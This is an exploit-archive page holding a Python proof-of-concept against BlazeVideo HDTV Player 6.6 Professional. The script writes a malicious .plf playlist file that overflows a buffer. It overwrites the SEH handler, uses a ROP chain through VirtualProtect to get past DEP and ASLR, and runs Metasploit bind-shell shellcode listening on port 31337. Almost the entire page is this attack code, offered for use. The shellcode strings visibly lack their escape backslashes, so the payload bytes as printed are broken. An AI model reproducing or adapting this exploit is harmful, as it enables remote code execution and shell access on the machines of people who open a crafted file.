Home / exploitsPDF  

BlazeVideo HDTV Player 6.6 Professional Buffer Overflow

Posted on 07 October 2011

# Exploit Title: BlazeVideo HDTV Player 6.6 Professional (Universal DEP+ASLR Bypass)
# Author: modpr0be
# Software Download: http://www.blazevideo.com/download.php?product=blazevideo-hdtv-pro
# Date: 07/10/2011
# Tested on: Windows XP SP3, Windows Vista SP2, Windows 7 SP1
# Thanks: corelanc0d3r, cyb3r.anbu, otoy, sickness, 5m7x, loneferret, _sinn3r, mr_me

# Take a look at mona.py :) awesome tool developed by corelanc0d3r and his team:
# https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/

# this is the old fashioned bug, i just try to make it universal :)
# it has also been exploited by:
# Greg Linares: http://www.exploit-db.com/exploits/2880
# LiquidWorm: http://www.exploit-db.com/exploits/7975
# hack4love: http://www.exploit-db.com/exploits/7975
# ThEg0bL!N: http://www.exploit-db.com/exploits/9360

#!/usr/bin/python

import struct
file = 'blazevideo-universal.plf'

totalsize = 5000
junk = 'A' * 872
align = 'B' * 136

#we don't need nseh
seh = struct.pack('<L', 0x6130534a)   # ADD ESP,800 # RETN    ** [DTVDeviceManager.dll]
rop = struct.pack('<L', 0x61326003) * 10 # RETN (ROP NOP) [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0x6405347a)   # POP EDX # RETN   ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x10011108)   # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
rop+= struct.pack('<L', 0x64010503)   # PUSH EDX # POP EAX # POP ESI # RETN    ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x41414141)   # Filler (compensate)
rop+= struct.pack('<L', 0x6160949f)   # MOV ECX,DWORD PTR DS:[EDX] # POP ESI # POP EBP # MOV DWORD PTR DS:[EAX],ECX # POP EBX # RETN 0C    ** [EPG.dll]
rop+= struct.pack('<L', 0x41414141) * 3   # Filler (compensate)
rop+= struct.pack('<L', 0x61604218)   # PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C    ** [EPG.dll]
rop+= struct.pack('<L', 0x41414141) * 3  # Filler (RETN offset compensation)
rop+= struct.pack('<L', 0x6403d1a6)   # POP EBP # RETN [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x41414141) * 3  # Filler (RETN offset compensation)
rop+= struct.pack('<L', 0x6161055A)   # & push esp #  ret 0c [EPG.dll]
rop+= struct.pack('<L', 0x61323EA8)   # POP EAX # RETN    ** [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0xA139799D)   # 0x00000501-> ebx
rop+= struct.pack('<L', 0x640203fc)   # ADD EAX,5EC68B64 # RETN    ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x6163d37b)   # PUSH EAX # ADD AL,5E # POP EBX # RETN    ** [EPG.dll]
rop+= struct.pack('<L', 0x61626807)   # XOR EAX,EAX # RETN    ** [EPG.dll]
rop+= struct.pack('<L', 0x640203fc)   # ADD EAX,5EC68B64 # RETN    ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x6405347a)   # POP EDX # RETN    ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0xA13974DC)   # 0x00000040-> edx
rop+= struct.pack('<L', 0x613107fb)   # ADD EDX,EAX # MOV EAX,EDX # RETN    ** [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0x61601fc0)   # POP ECX # RETN [EPG.dll]
rop+= struct.pack('<L', 0x60350340)   # &Writable location [AviosoftDTV.exe]
rop+= struct.pack('<L', 0x61329e07)   # POP EDI # RETN [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0x61326003)   # RETN (ROP NOP) [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0x61606595)   # POP EAX # RETN ** [EPG.dll]
rop+= struct.pack('<L', 0x90909090)   # nop
rop+= struct.pack('<L', 0x61620CF1)   # PUSHAD # RETN [EPG.dll]

nop = 'x90' * 32

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=31337, RHOST=, EXITFUNC=process,

shellcode = (
"xddxc1xd9x74x24xf4xbbxc4xaax69x8ax58x33xc9xb1"
"x56x83xe8xfcx31x58x14x03x58xd0x48x9cx76x30x05"
"x5fx87xc0x76xe9x62xf1xa4x8dxe7xa3x78xc5xaax4f"
"xf2x8bx5exc4x76x04x50x6dx3cx72x5fx6exf0xbax33"
"xacx92x46x4exe0x74x76x81xf5x75xbfxfcxf5x24x68"
"x8axa7xd8x1dxcex7bxd8xf1x44xc3xa2x74x9axb7x18"
"x76xcbx67x16x30xf3x0cx70xe1x02xc1x62xddx4dx6e"
"x50x95x4fxa6xa8x56x7ex86x67x69x4ex0bx79xadx69"
"xf3x0cxc5x89x8ex16x1exf3x54x92x83x53x1fx04x60"
"x65xccxd3xe3x69xb9x90xacx6dx3cx74xc7x8axb5x7b"
"x08x1bx8dx5fx8cx47x56xc1x95x2dx39xfexc6x8axe6"
"x5ax8cx39xf3xddxcfx55x30xd0xefxa5x5ex63x83x97"
"xc1xdfx0bx94x8axf9xccxdbxa1xbex43x22x49xbfx4a"
"xe1x1dxefxe4xc0x1dx64xf5xedxc8x2bxa5x41xa2x8b"
"x15x22x12x64x7cxadx4dx94x7fx67xf8x92xb1x53xa9"
"x74xb0x63x37xecx3dx85xadxfex6bx1dx59x3dx48x96"
"xfex3exbax8ax57xa9xf2xc4x6fxd6x02xc3xdcx7bxaa"
"x84x96x97x6fxb4xa9xbdxc7xbfx92x56x9dxd1x51xc6"
"xa2xfbx01x6bx30x60xd1xe2x29x3fx86xa3x9cx36x42"
"x5ex86xe0x70xa3x5excax30x78xa3xd5xb9x0dx9fxf1"
"xa9xcbx20xbex9dx83x76x68x4bx62x21xdax25x3cx9e"
"xb4xa1xb9xecx06xb7xc5x38xf1x57x77x95x44x68xb8"
"x71x41x11xa4xe1xaexc8x6cx11xe5x50xc4xbaxa0x01"
"x54xa7x52xfcx9bxdexd0xf4x63x25xc8x7dx61x61x4e"
"x6ex1bxfax3bx90x88xfbx69")

sisa = 'C' * (totalsize - len(seh+rop+nop+shellcode))
payload = junk+seh+align+rop+nop+shellcode+sisa

f = open(file,'w')
print "Author: modpr0be"
f.write(payload)
print "File",file, "successfully created"
f.close()

 

TOP

Malware :

Exploits :